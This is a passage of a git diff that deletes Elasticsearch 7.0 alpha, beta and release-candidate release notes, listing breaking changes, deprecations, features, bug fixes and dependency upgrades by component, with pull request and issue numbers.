{es-pull}36825[#36825] - - - -[[regression-7.0.0-beta1]] -[discrete] -=== Regressions - -Infra/Core:: -* Restore date aggregation performance in UTC case {es-pull}38221[#38221] (issue: {es-issue}37826[#37826]) -* Speed up converting of temporal accessor to zoned date time {es-pull}37915[#37915] (issue: {es-issue}37826[#37826]) - -Mapping:: -* Performance fix. Reduce deprecation calls for the same bulk request {es-pull}37415[#37415] (issue: {es-issue}37411[#37411]) - - - -[[upgrade-7.0.0-beta1]] -[discrete] -=== Upgrades - -Engine:: -* Upgrade to lucene-8.0.0-snapshot-83f9835. {es-pull}37668[#37668] - -Machine Learning:: -* [ML] No need to add state doc mapping on job open in 7.x {es-pull}37759[#37759] - - - diff --git a/docs/reference/release-notes/7.0.0-rc1.asciidoc b/docs/reference/release-notes/7.0.0-rc1.asciidoc deleted file mode 100644 index 80b5190db4a..00000000000 --- a/docs/reference/release-notes/7.0.0-rc1.asciidoc +++ /dev/null @@ -1,193 +0,0 @@ -[[release-notes-7.0.0-rc1]] -== {es} version 7.0.0-rc1 - -Also see <>. 
- -[[breaking-7.0.0-rc1]] -[discrete] -=== Breaking changes - -Distributed:: -* Remove cluster state size {es-pull}40061[#40061] (issues: {es-issue}39806[#39806], {es-issue}39827[#39827], {es-issue}39951[#39951], {es-issue}40016[#40016]) - -Features/Features:: -* Remove Migration Upgrade and Assistance APIs {es-pull}40075[#40075] (issue: {es-issue}40014[#40014]) - - - -[[deprecation-7.0.0-rc1]] -[discrete] -=== Deprecations - -Cluster Coordination:: -* Deprecate size in cluster state response {es-pull}39951[#39951] (issue: {es-issue}39806[#39806]) - -Infra/Packaging:: -* Deprecate fallback to java on PATH {es-pull}37990[#37990] - - - -[[feature-7.0.0-rc1]] -[discrete] -=== New features - -Allocation:: -* Node repurpose tool {es-pull}39403[#39403] (issues: {es-issue}37347[#37347], {es-issue}37748[#37748]) - -Security:: -* Switch internal security index to ".security-7" {es-pull}39337[#39337] (issue: {es-issue}39284[#39284]) - - - -[[enhancement-7.0.0-rc1]] -[discrete] -=== Enhancements - -CCR:: -* Reduce retention lease sync intervals {es-pull}40302[#40302] -* Renew retention leases while following {es-pull}39335[#39335] (issues: {es-issue}37165[#37165], {es-issue}38718[#38718]) -* Reduce refresh when lookup term in FollowingEngine {es-pull}39184[#39184] -* Integrate retention leases to recovery from remote {es-pull}38829[#38829] (issue: {es-issue}37165[#37165]) -* Enable removal of retention leases {es-pull}38751[#38751] (issue: {es-issue}37165[#37165]) - -Client:: -* Fixed required fields and paths list {es-pull}39358[#39358] - -Discovery-Plugins:: -* Adds connect and read timeouts to discovery-gce {es-pull}28193[#28193] (issue: {es-issue}24313[#24313]) - -Distributed:: -* Introduce retention lease actions {es-pull}38756[#38756] (issue: {es-issue}37165[#37165]) -* Add dedicated retention lease exceptions {es-pull}38754[#38754] (issue: {es-issue}37165[#37165]) -* Copy retention leases when trim unsafe commits {es-pull}37995[#37995] (issue: {es-issue}37165[#37165]) - -Docs Infrastructure:: -* Align generated release notes with doc standards {es-pull}39234[#39234] (issue: {es-issue}39155[#39155]) - -Engine:: -* Explicitly advance max_seq_no before indexing {es-pull}39473[#39473] (issue: {es-issue}38879[#38879]) - -Infra/Core:: -* Add details about what acquired the shard lock last {es-pull}38807[#38807] (issue: {es-issue}30290[#30290]) - -Infra/Packaging:: -* Use bundled JDK in Docker images {es-pull}40238[#40238] -* Upgrade bundled JDK and Docker images to JDK 12 {es-pull}40229[#40229] -* Bundle java in distributions {es-pull}38013[#38013] (issue: {es-issue}31845[#31845]) - -Infra/Settings:: -* Provide a clearer error message on keystore add {es-pull}39327[#39327] (issue: {es-issue}39324[#39324]) - -Percolator:: -* Make the `type` parameter optional when percolating existing documents. 
{es-pull}39987[#39987] (issue: {es-issue}39963[#39963]) -* Add support for selecting percolator query candidate matches containing geo_point based queries {es-pull}26040[#26040] - -SQL:: -* Enhance checks for inexact fields {es-pull}39427[#39427] (issue: {es-issue}38501[#38501]) -* Change the default precision for CURRENT_TIMESTAMP function {es-pull}39391[#39391] (issue: {es-issue}39288[#39288]) - - - -[[bug-7.0.0-rc1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Skip sibling pipeline aggregators reduction during non-final reduce {es-pull}40101[#40101] (issue: {es-issue}40059[#40059]) -* Extend nextDoc to delegate to the wrapped doc-value iterator for date_nanos {es-pull}39176[#39176] (issue: {es-issue}39107[#39107]) -* Only create MatrixStatsResults on final reduction {es-pull}38130[#38130] (issue: {es-issue}37587[#37587]) - -Authentication:: -* Allow non super users to create API keys {es-pull}40028[#40028] (issue: {es-issue}40029[#40029]) -* Use consistent view of realms for authentication {es-pull}38815[#38815] (issue: {es-issue}30301[#30301]) - -CCR:: -* Safe publication of AutoFollowCoordinator {es-pull}40153[#40153] (issue: {es-issue}38560[#38560]) -* Enable reading auto-follow patterns from x-content {es-pull}40130[#40130] (issue: {es-issue}40128[#40128]) -* Stop auto-followers on shutdown {es-pull}40124[#40124] -* Protect against the leader index being removed {es-pull}39351[#39351] (issue: {es-issue}39308[#39308]) -* Handle the fact that `ShardStats` instance may have no commit or seqno stats {es-pull}38782[#38782] (issue: {es-issue}38779[#38779]) -* Fix LocalIndexFollowingIT#testRemoveRemoteConnection() test {es-pull}38709[#38709] (issue: {es-issue}38695[#38695]) - -CRUD:: -* Cascading primary failure led to MSU too low {es-pull}40249[#40249] - -Cluster Coordination:: -* Fix node tool cleanup {es-pull}39389[#39389] -* Avoid serialising state if it was already serialised {es-pull}39179[#39179] - -Distributed:: -* Ignore waitForActiveShards when syncing leases {es-pull}39224[#39224] (issue: {es-issue}39089[#39089]) -* Fix synchronization in LocalCheckpointTracker#contains {es-pull}38755[#38755] (issues: {es-issue}33871[#33871], {es-issue}38633[#38633]) - -Engine:: -* Bubble up exception when processing NoOp {es-pull}39338[#39338] (issue: {es-issue}38898[#38898]) -* ReadOnlyEngine should update translog recovery state information {es-pull}39238[#39238] - -Features/Features:: -* Only count some field types for deprecation check {es-pull}40166[#40166] - -Features/ILM:: -* Handle failure to release retention leases in ILM {es-pull}39281[#39281] (issue: {es-issue}39181[#39181]) - -Features/Watcher:: -* Use non-ILM template setting up watch history template & ILM disabled {es-pull}39325[#39325] (issue: {es-issue}38805[#38805]) -* Only flush Watcher's bulk processor if Watcher is enabled {es-pull}38803[#38803] (issue: {es-issue}38798[#38798]) - -Infra/Core:: -* Correct name of basic_date_time_no_millis {es-pull}39367[#39367] - -Infra/Packaging:: -* Some elasticsearch-cli tools could not be run from outside ES_HOME {es-pull}39937[#39937] -* Obsolete pre 7.0 noarch package in rpm {es-pull}39472[#39472] (issue: {es-issue}39414[#39414]) -* Suppress error message when `/proc/sys/vm/max_map_count` does not exist. 
{es-pull}35933[#35933] - -Infra/REST API:: -* Fix #38623 remove xpack namespace REST API {es-pull}38625[#38625] -* Remove the "xpack" namespace from the REST API {es-pull}38623[#38623] - -Recovery:: -* Create retention leases file during recovery {es-pull}39359[#39359] (issue: {es-issue}37165[#37165]) - -SQL:: -* Add missing handling of IP field in JDBC {es-pull}40384[#40384] (issue: {es-issue}40358[#40358]) -* Fix metric aggs on date/time to not return double {es-pull}40377[#40377] (issues: {es-issue}39492[#39492], {es-issue}40376[#40376]) -* CAST supports both SQL and ES types {es-pull}40365[#40365] (issue: {es-issue}40282[#40282]) -* Fix RLIKE bug and improve testing for RLIKE statement {es-pull}40354[#40354] (issues: {es-issue}34609[#34609], {es-issue}39931[#39931]) -* Unwrap the first value in an array in case of array leniency {es-pull}40318[#40318] (issue: {es-issue}40296[#40296]) -* Preserve original source for cast/convert function {es-pull}40271[#40271] (issue: {es-issue}40239[#40239]) -* Fix LIKE function equality by considering its pattern as well {es-pull}40260[#40260] (issue: {es-issue}39931[#39931]) -* Fix issue with optimization on queries with ORDER BY/LIMIT {es-pull}40256[#40256] (issue: {es-issue}40211[#40211]) -* Rewrite ROUND and TRUNCATE functions with a different optional parameter handling method {es-pull}40242[#40242] (issue: {es-issue}40001[#40001]) -* Fix issue with getting DATE type in JDBC {es-pull}40207[#40207] -* Fix issue with date columns returned always in UTC {es-pull}40163[#40163] (issue: {es-issue}40152[#40152]) -* Add multi_value_field_leniency inside FieldHitExtractor {es-pull}40113[#40113] (issue: {es-issue}39700[#39700]) -* Fix incorrect ordering of groupings (GROUP BY) based on orderings (ORDER BY) {es-pull}40087[#40087] (issue: {es-issue}39956[#39956]) -* Fix bug with JDBC timezone setting and DATE type {es-pull}39978[#39978] (issue: {es-issue}39915[#39915]) -* Use underlying exact field for LIKE/RLIKE {es-pull}39443[#39443] (issue: {es-issue}39442[#39442]) - -Search:: -* Serialize top-level pipeline aggs as part of InternalAggregations {es-pull}40177[#40177] (issues: {es-issue}40059[#40059], {es-issue}40101[#40101]) -* CCS: Skip empty search hits when minimizing round-trips {es-pull}40098[#40098] (issues: {es-issue}32125[#32125], {es-issue}40067[#40067]) -* CCS: Disable minimizing round-trips when dfs is requested {es-pull}40044[#40044] (issue: {es-issue}32125[#32125]) - - - -[[upgrade-7.0.0-rc1]] -[discrete] -=== Upgrades - -Discovery-Plugins:: -* Bump jackson-databind version for AWS SDK {es-pull}39183[#39183] - -Engine:: -* Upgrade to Lucene 8.0.0-snapshot-ff9509a8df {es-pull}39350[#39350] -* Upgrade to Lucene 8.0.0 {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - -Features/Ingest:: -* Bump jackson-databind version for ingest-geoip {es-pull}39182[#39182] - -Security:: -* Upgrade the bouncycastle dependency to 1.61 {es-pull}40017[#40017] (issue: {es-issue}40011[#40011]) - - diff --git a/docs/reference/release-notes/7.0.0-rc2.asciidoc b/docs/reference/release-notes/7.0.0-rc2.asciidoc deleted file mode 100644 index 4397d457b9e..00000000000 --- a/docs/reference/release-notes/7.0.0-rc2.asciidoc +++ /dev/null @@ -1,218 +0,0 @@ -[[release-notes-7.0.0-rc2]] -== {es} version 7.0.0-rc2 - -Also see <>. 
- -[[deprecation-7.0.0-rc2]] -[discrete] -=== Deprecations - -Analysis:: -* Remove `nGram` and `edgeNGram` token filter names (#38911) {es-pull}39070[#39070] (issues: {es-issue}30209[#30209], {es-issue}38911[#38911]) - -Graph:: -* Deprecate types in `_graph/explore` calls. {es-pull}40466[#40466] - - - -[[enhancement-7.0.0-rc2]] -[discrete] -=== Enhancements - -CCR:: -* Introduce forget follower API {es-pull}39718[#39718] (issue: {es-issue}37165[#37165]) - -Cluster Coordination:: -* Remove timeout task after completing cluster state publication {es-pull}40411[#40411] -* Use default discovery implementation for single-node discovery {es-pull}40036[#40036] -* Do not log unsuccessful join attempt each time {es-pull}39756[#39756] - -Distributed:: -* Allow retention lease operations under blocks {es-pull}39089[#39089] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Remove retention leases when unfollowing {es-pull}39088[#39088] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Introduce retention lease state file {es-pull}39004[#39004] (issues: {es-issue}37165[#37165], {es-issue}38588[#38588], {es-issue}39032[#39032]) -* Enable soft-deletes by default for 7.0+ indices {es-pull}38929[#38929] (issue: {es-issue}36141[#36141]) - -Engine:: -* Also mmap cfs files for hybridfs {es-pull}38940[#38940] (issue: {es-issue}36668[#36668]) - -Infra/Core:: -* Enhancements to IndicesQueryCache. {es-pull}39099[#39099] (issue: {es-issue}37117[#37117]) - -Infra/Packaging:: -* Add no-jdk distributions {es-pull}39882[#39882] - -Machine Learning:: -* [ML] Allow stop unassigned datafeed and relax unset upgrade mode wait {es-pull}39034[#39034] - -Mapping:: -* Introduce a parameter suppress_types_warnings. {es-pull}38923[#38923] - -Recovery:: -* Do not wait for advancement of checkpoint in recovery {es-pull}39006[#39006] (issues: {es-issue}38949[#38949], {es-issue}39000[#39000]) - -SQL:: -* SQL: add "fuzziness" option to QUERY and MATCH function predicates {es-pull}40529[#40529] (issue: {es-issue}40495[#40495]) -* SQL: add "validate.properties" property to JDBC's allowed list of settings {es-pull}39050[#39050] (issue: {es-issue}38068[#38068]) - -Search:: -* Avoid BytesRef's copying in ScriptDocValues's Strings {es-pull}29581[#29581] (issue: {es-issue}29567[#29567]) - -Security:: -* Types removal security index template {es-pull}39705[#39705] (issue: {es-issue}38637[#38637]) -* Types removal security index template {es-pull}39542[#39542] (issue: {es-issue}38637[#38637]) - -Snapshot/Restore:: -* Mark Deleted Snapshot Directories with Tombstones {es-pull}40228[#40228] (issue: {es-issue}39852[#39852]) - -Store:: -* Add option to force load term dict into memory {es-pull}39741[#39741] - -Features/Monitoring:: -* Remove types from internal monitoring templates and bump to api 7 {es-pull}39888[#39888] (issue: {es-issue}38637[#38637]) - -Features/Watcher:: -* Remove the index type from internal watcher indexes {es-pull}39761[#39761] (issue: {es-issue}38637[#38637]) - -Infra/Core:: -* Change zone formatting for all printers {es-pull}39568[#39568] (issue: {es-issue}38471[#38471]) - - -[[bug-7.0.0-rc2]] -[discrete] -=== Bug fixes - -Analysis:: -* Fix PreConfiguredTokenFilters getSynonymFilter() implementations {es-pull}38839[#38839] (issue: {es-issue}38793[#38793]) - -Audit:: -* LoggingAuditTrail correctly handle ReplicatedWriteRequest {es-pull}39925[#39925] (issue: {es-issue}39555[#39555]) - -Authentication:: -* Correct authenticate response for API key {es-pull}39684[#39684] -* Fix security index 
auto-create and state recovery race {es-pull}39582[#39582] - -CCR:: -* Fix shard follow task startup error handling {es-pull}39053[#39053] (issue: {es-issue}38779[#38779]) -* Filter out upgraded version index settings when starting index following {es-pull}38838[#38838] (issue: {es-issue}38835[#38835]) - -CRUD:: -* Store Pending Deletions Fix {es-pull}40345[#40345] (issue: {es-issue}40249[#40249]) -* ShardBulkAction ignore primary response on primary {es-pull}38901[#38901] - -Cluster Coordination:: -* Do not perform cleanup if Manifest write fails with dirty exception {es-pull}40519[#40519] (issue: {es-issue}39077[#39077]) -* Cache compressed cluster state size {es-pull}39827[#39827] (issue: {es-issue}39806[#39806]) -* Drop node if asymmetrically partitioned from master {es-pull}39598[#39598] -* Fixing the custom object serialization bug in diffable utils. {es-pull}39544[#39544] -* Clean GatewayAllocator when stepping down as master {es-pull}38885[#38885] - -Distributed:: -* Enforce retention leases require soft deletes {es-pull}39922[#39922] (issue: {es-issue}39914[#39914]) -* Treat TransportService stopped error as node is closing {es-pull}39800[#39800] (issue: {es-issue}39584[#39584]) -* Use cause to determine if node with primary is closing {es-pull}39723[#39723] (issue: {es-issue}39584[#39584]) -* Don’t ack if unable to remove failing replica {es-pull}39584[#39584] (issue: {es-issue}39467[#39467]) -* Fix NPE on Stale Index in IndicesService {es-pull}38891[#38891] (issue: {es-issue}38845[#38845]) - -Engine:: -* Advance max_seq_no before add operation to Lucene {es-pull}38879[#38879] (issue: {es-issue}31629[#31629]) - -Features/Features:: -* Deprecation check for indices with very large numbers of fields {es-pull}39869[#39869] (issue: {es-issue}39851[#39851]) - -Features/ILM:: -* Correct ILM metadata minimum compatibility version {es-pull}40569[#40569] (issue: {es-issue}40565[#40565]) -* Handle null retention leases in WaitForNoFollowersStep {es-pull}40477[#40477] - -Features/Ingest:: -* Ingest ingest then create index {es-pull}39607[#39607] (issues: {es-issue}32758[#32758], {es-issue}32786[#32786], {es-issue}36545[#36545]) - -Features/Monitoring:: -* Don't emit deprecation warnings on calls to the monitoring bulk API. 
{es-pull}39805[#39805] (issue: {es-issue}39336[#39336]) - -Features/Watcher:: -* Fix Watcher stats class cast exception {es-pull}39821[#39821] (issue: {es-issue}39780[#39780]) -* Use any index specified by .watches for Watcher {es-pull}39541[#39541] (issue: {es-issue}39478[#39478]) -* Resolve concurrency with watcher trigger service {es-pull}39092[#39092] (issue: {es-issue}39087[#39087]) - -Geo:: -* Geo Point parse error fix {es-pull}40447[#40447] (issue: {es-issue}17617[#17617]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39750[#39750] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Allow single digit milliseconds in strict date parsing {es-pull}40676[#40676] (issue: {es-issue}40403[#40403]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) -* Bat scripts to work with JAVA_HOME with parantheses {es-pull}39712[#39712] (issues: {es-issue}30606[#30606], {es-issue}33405[#33405], {es-issue}38578[#38578], {es-issue}38624[#38624]) -* Change licence expiration date pattern {es-pull}39681[#39681] (issue: {es-issue}39136[#39136]) -* Fix DateFormatters.parseMillis when no timezone is given {es-pull}39100[#39100] (issue: {es-issue}39067[#39067]) -* Don't close caches while there might still be in-flight requests. {es-pull}38958[#38958] (issue: {es-issue}37117[#37117]) - -Infra/Packaging:: -* Use TAR instead of DOCKER build type before 6.7.0 {es-pull}40723[#40723] (issues: {es-issue}39378[#39378], {es-issue}40511[#40511]) - -Infra/REST API:: -* Update spec files that erroneously documented parts as optional {es-pull}39122[#39122] -* ilm.explain_lifecycle documents human again {es-pull}39113[#39113] -* Index on rollup.rollup_search.json is a list {es-pull}39097[#39097] - -MULTIPLE AREA LABELS:: -* metric on watcher stats is a list not an enum {es-pull}39114[#39114] - -Machine Learning:: -* [ML] Fix datafeed skipping first bucket after lookback when aggs are … {es-pull}39859[#39859] (issue: {es-issue}39842[#39842]) -* [ML] refactoring lazy query and agg parsing {es-pull}39776[#39776] (issue: {es-issue}39528[#39528]) -* [ML] Stop the ML memory tracker before closing node {es-pull}39111[#39111] (issue: {es-issue}37117[#37117]) - -Mapping:: -* Optimise rejection of out-of-range `long` values {es-pull}40325[#40325] (issues: {es-issue}26137[#26137], {es-issue}40323[#40323]) - -Recovery:: -* Recover peers from translog, ignoring soft deletes {es-pull}38904[#38904] (issue: {es-issue}37165[#37165]) -* Retain history for peer recovery using leases {es-pull}38855[#38855] - -Rollup:: -* Remove timezone validation on rollup range queries {es-pull}40647[#40647] - -SQL:: -* SQL: Fix display size for DATE/DATETIME {es-pull}40669[#40669] -* SQL: have LIKE/RLIKE use wildcard and regexp queries {es-pull}40628[#40628] (issue: {es-issue}40557[#40557]) -* SQL: Fix getTime() methods in JDBC {es-pull}40484[#40484] -* SQL: SYS TABLES: enumerate tables of requested types {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* SQL: passing an input to the CLI "freezes" the CLI after displaying an error message {es-pull}40164[#40164] (issue: {es-issue}40557[#40557]) -* SQL: Wrap ZonedDateTime parameters inside scripts {es-pull}39911[#39911] (issue: {es-issue}39877[#39877]) -* SQL: ConstantProcessor can now handle NamedWriteable {es-pull}39876[#39876] (issue: {es-issue}39875[#39875]) -* SQL: Extend the multi dot field notation extraction to lists of values {es-pull}39823[#39823] (issue: {es-issue}39738[#39738]) -* SQL: 
values in datetime script aggs should be treated as long {es-pull}39773[#39773] (issue: {es-issue}37042[#37042]) -* SQL: Don't allow inexact fields for MIN/MAX {es-pull}39563[#39563] (issue: {es-issue}39427[#39427]) -* SQL: Fix merging of incompatible multi-fields {es-pull}39560[#39560] (issue: {es-issue}39547[#39547]) -* SQL: fix COUNT DISTINCT column name {es-pull}39537[#39537] (issue: {es-issue}39511[#39511]) -* SQL: Enable accurate hit tracking on demand {es-pull}39527[#39527] (issue: {es-issue}37971[#37971]) -* SQL: ignore UNSUPPORTED fields for JDBC and ODBC modes in 'SYS COLUMNS' {es-pull}39518[#39518] (issue: {es-issue}39471[#39471]) -* SQL: enforce JDBC driver - ES server version parity {es-pull}38972[#38972] (issue: {es-issue}38775[#38775]) -* SQL: fall back to using the field name for column label {es-pull}38842[#38842] (issue: {es-issue}38831[#38831]) - -Search:: -* Fix Fuzziness#asDistance(String) {es-pull}39643[#39643] (issue: {es-issue}39614[#39614]) - -Security:: -* Remove dynamic objects from security index {es-pull}40499[#40499] (issue: {es-issue}35460[#35460]) -* Fix libs:ssl-config project setup {es-pull}39074[#39074] -* Do not create the missing index when invoking getRole {es-pull}39039[#39039] - -Snapshot/Restore:: -* Blob store compression fix {es-pull}39073[#39073] - - - -[[upgrade-7.0.0-rc2]] -[discrete] -=== Upgrades - -Snapshot/Restore:: -* plugins/repository-gcs: Update google-cloud-storage/core to 1.59.0 {es-pull}39748[#39748] (issue: {es-issue}39366[#39366]) - -Search:: -* Upgrade to Lucene 8.0.0 GA {es-pull}39992[#39992] (issue: {es-issue}39640[#39640]) - diff --git a/docs/reference/release-notes/7.0.asciidoc b/docs/reference/release-notes/7.0.asciidoc deleted file mode 100644 index f457b9652ff..00000000000 --- a/docs/reference/release-notes/7.0.asciidoc +++ /dev/null @@ -1,1658 +0,0 @@ -[[release-notes-7.0.0]] -== {es} version 7.0.0 - -These release notes include all changes made in the alpha, beta, and RC -releases of 7.0.0. - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to avoid shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likelihood of this -corruption if deletes or updates are applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns can cause parsing errors, incorrect date calculations, or wrong search results -(see https://github.com/elastic/elasticsearch/pull/52555). -This is fixed in {es} 7.7 and later versions. 
- - -[[breaking-7.0.0]] -[discrete] -=== Breaking changes - -Aggregations:: -* Remove support for deprecated params._agg/_aggs for scripted metric aggregations {es-pull}32979[#32979] (issues: {es-issue}29328[#29328], {es-issue}31597[#31597]) -* Percentile/Ranks should return null instead of NaN when empty {es-pull}30460[#30460] (issue: {es-issue}29066[#29066]) -* Render sum as zero if count is zero for stats aggregation {es-pull}27193[#27193] (issue: {es-issue}26893[#26893]) - -Analysis:: -* Remove `delimited_payload_filter` {es-pull}27705[#27705] (issues: {es-issue}26625[#26625], {es-issue}27704[#27704]) -* Limit the number of tokens produced by _analyze {es-pull}27529[#27529] (issue: {es-issue}27038[#27038]) -* Add limits for ngram and shingle settings {es-pull}27211[#27211] (issue: {es-issue}25887[#25887]) - -Audit:: -* Logfile auditing settings remove after deprecation {es-pull}35205[#35205] -* Remove index audit output type {es-pull}37707[#37707] (issues: {es-issue}29881[#29881], {es-issue}37301[#37301]) - -Authentication:: -* Security: remove wrapping in put user response {es-pull}33512[#33512] (issue: {es-issue}32332[#32332]) -* Remove bwc logic for token invalidation {es-pull}36893[#36893] (issue: {es-issue}36727[#36727]) - -Authorization:: -* Remove aliases resolution limitations when security is enabled {es-pull}31952[#31952] (issue: {es-issue}31516[#31516]) -* Remove implicit index monitor privilege {es-pull}37774[#37774] - -Circuit Breakers:: -* Lower fielddata circuit breaker's default limit {es-pull}27162[#27162] (issue: {es-issue}27130[#27130]) - -CRUD:: -* Version conflict exception message enhancement {es-pull}29432[#29432] (issue: {es-issue}21278[#21278]) -* Using ObjectParser in UpdateRequest {es-pull}29293[#29293] (issue: {es-issue}28740[#28740]) -* Remove support for internal versioning for concurrency control {es-pull}38254[#38254] (issue: {es-issue}1078[#1078]) - -Distributed:: -* Remove undocumented action.master.force_local setting {es-pull}29351[#29351] -* Remove tribe node support {es-pull}28443[#28443] -* Forbid negative values for index.unassigned.node_left.delayed_timeout {es-pull}26828[#26828] -* Remove cluster state size {es-pull}40061[#40061] (issues: {es-issue}39806[#39806], {es-issue}39827[#39827], {es-issue}39951[#39951], {es-issue}40016[#40016]) - -Features/Features:: -* Remove Migration Upgrade and Assistance APIs {es-pull}40075[#40075] (issue: {es-issue}40014[#40014]) - -Features/Indices APIs:: -* Indices Exists API should return 404 for empty wildcards {es-pull}34499[#34499] -* Default to one shard {es-pull}30539[#30539] -* Limit the number of nested documents {es-pull}27405[#27405] (issue: {es-issue}26962[#26962]) - -Features/Ingest:: -* Add Configuration Except. 
Data to Metdata {es-pull}32322[#32322] (issue: {es-issue}27728[#27728]) -* Add ECS schema for user-agent ingest processor (#37727) {es-pull}37984[#37984] (issues: {es-issue}37329[#37329], {es-issue}37727[#37727]) -* Remove special handling for ingest plugins {es-pull}36967[#36967] (issues: {es-issue}36898[#36898], {es-issue}36956[#36956]) - -Features/Java Low Level REST Client:: -* Drop support for the low-level REST client on JDK 7 {es-pull}38540[#38540] (issue: {es-issue}29607[#29607]) - -Features/Watcher:: -* Remove Watcher Account "unsecure" settings {es-pull}36736[#36736] (issue: {es-issue}36403[#36403]) - -Features/Stats:: -* Remove the suggest metric from stats APIs {es-pull}29635[#29635] (issue: {es-issue}29589[#29589]) -* Align cat thread pool info to thread pool config {es-pull}29195[#29195] (issue: {es-issue}29123[#29123]) -* Align thread pool info to thread pool configuration {es-pull}29123[#29123] (issue: {es-issue}29113[#29113]) - -Geo:: -* Use geohash cell instead of just a corner in geo_bounding_box {es-pull}30698[#30698] (issue: {es-issue}25154[#25154]) - -Index APIs:: -* Always enforce cluster-wide shard limit {es-pull}34892[#34892] (issues: {es-issue}20705[#20705], {es-issue}34021[#34021]) - -Infra/Circuit Breakers:: -* Introduce durability of circuit breaking exception {es-pull}34460[#34460] (issue: {es-issue}31986[#31986]) -* Circuit-break based on real memory usage {es-pull}31767[#31767] - -Infra/Core:: -* Default node.name to the hostname {es-pull}33677[#33677] -* Remove bulk fallback for write thread pool {es-pull}29609[#29609] -* CCS: Drop http address from remote cluster info {es-pull}29568[#29568] (issue: {es-issue}29207[#29207]) -* Remove the index thread pool {es-pull}29556[#29556] -* Main response should not have status 503 when okay {es-pull}29045[#29045] (issue: {es-issue}8902[#8902]) -* Automatically prepare indices for splitting {es-pull}27451[#27451] -* Don't refresh on `_flush` `_force_merge` and `_upgrade` {es-pull}27000[#27000] (issue: {es-issue}26972[#26972]) - -Infra/Logging:: -* Elasticsearch json logging {es-pull}36833[#36833] (issue: {es-issue}32850[#32850]) - -Infra/Packaging:: -* Packaging: Remove windows bin files from the tar distribution {es-pull}30596[#30596] -* Package ingest-user-agent as a module {es-pull}36956[#36956] -* Package ingest-geoip as a module {es-pull}36898[#36898] - -Infra/REST API:: -* Remove GET support for clear cache indices {es-pull}29525[#29525] -* Clear Indices Cache API remove deprecated url params {es-pull}29068[#29068] - -Infra/Scripting:: -* Remove support for deprecated StoredScript contexts {es-pull}31394[#31394] (issues: {es-issue}27612[#27612], {es-issue}28939[#28939]) -* Remove getDate methods from ScriptDocValues {es-pull}30690[#30690] -* Drop `ScriptDocValues#date` and `ScriptDocValues#dates` in 7.0.0 {es-pull}30690[#30690] (issue: {es-issue}23008[#23008]) - -Infra/Settings:: -* Remove config prompting for secrets and text {es-pull}27216[#27216] - -Machine Learning:: -* Remove types from datafeed {es-pull}36538[#36538] (issue: {es-issue}34265[#34265]) - -Mapping:: -* Match phrase queries against non-indexed fields should throw an exception {es-pull}31060[#31060] -* Remove legacy mapping code. {es-pull}29224[#29224] -* Reject updates to the `_default_` mapping. {es-pull}29165[#29165] (issues: {es-issue}15613[#15613], {es-issue}28248[#28248]) -* Remove the `update_all_types` option. {es-pull}28288[#28288] -* Remove the `_default_` mapping. 
{es-pull}28248[#28248] -* Reject the `index_options` parameter for numeric fields {es-pull}26668[#26668] (issue: {es-issue}21475[#21475]) -* Update the default for include_type_name to false. {es-pull}37285[#37285] -* Support 'include_type_name' in RestGetIndicesAction {es-pull}37149[#37149] - -Network:: -* Remove http.enabled setting {es-pull}29601[#29601] (issue: {es-issue}12792[#12792]) -* Remove HTTP max content length leniency {es-pull}29337[#29337] -* Remove TLS 1.0 as a default SSL protocol {es-pull}37512[#37512] (issue: {es-issue}36021[#36021]) -* Security: remove SSL settings fallback {es-pull}36846[#36846] (issue: {es-issue}29797[#29797]) - -Percolator:: -* Remove deprecated percolator map_unmapped_fields_as_string setting {es-pull}28060[#28060] - -Ranking:: -* Add minimal sanity checks to custom/scripted similarities. {es-pull}33564[#33564] (issue: {es-issue}33309[#33309]) -* Scroll queries asking for rescore are considered invalid {es-pull}32918[#32918] (issue: {es-issue}31775[#31775]) -* Forbid negative scores in function_score query {es-pull}35709[#35709] (issue: {es-issue}33309[#33309]) -* Forbid negative field boosts in analyzed queries {es-pull}37930[#37930] (issue: {es-issue}33309[#33309]) - -Scripting:: -* Delete deprecated getValues from ScriptDocValues {es-pull}36183[#36183] (issue: {es-issue}22919[#22919]) - -Search:: -* Remove deprecated url parameters `_source_include` and `_source_exclude` {es-pull}35097[#35097] (issues: {es-issue}22792[#22792], {es-issue}33475[#33475]) -* Disallow negative query boost {es-pull}34486[#34486] (issue: {es-issue}33309[#33309]) -* Forbid negative `weight` in Function Score Query {es-pull}33390[#33390] (issue: {es-issue}31927[#31927]) -* In the field capabilities API, remove support for providing fields in the request body. {es-pull}30185[#30185] -* Remove deprecated options for query_string {es-pull}29203[#29203] (issue: {es-issue}25551[#25551]) -* Fix Laplace scorer to multiply by alpha (and not add) {es-pull}27125[#27125] -* Remove _primary and _replica shard preferences {es-pull}26791[#26791] (issue: {es-issue}26335[#26335]) -* Limit the number of expanded fields it query_string and simple_query_string {es-pull}26541[#26541] (issue: {es-issue}25105[#25105]) -* Make purely negative queries return scores of 0. {es-pull}26015[#26015] (issue: {es-issue}23449[#23449]) -* Remove the deprecated _termvector endpoint. {es-pull}36131[#36131] (issues: {es-issue}36098[#36098], {es-issue}8484[#8484]) -* Remove deprecated Graph endpoints {es-pull}35956[#35956] -* Validate metadata on `_msearch` {es-pull}35938[#35938] (issue: {es-issue}35869[#35869]) -* Make hits.total an object in the search response {es-pull}35849[#35849] (issue: {es-issue}33028[#33028]) -* Remove the distinction between query and filter context in QueryBuilders {es-pull}35354[#35354] (issue: {es-issue}35293[#35293]) -* Throw a parsing exception when boost is set in span_or query (#28390) {es-pull}34112[#34112] (issue: {es-issue}28390[#28390]) -* Track total hits up to 10,000 by default {es-pull}37466[#37466] (issue: {es-issue}33028[#33028]) -* Use mappings to format doc-value fields by default. 
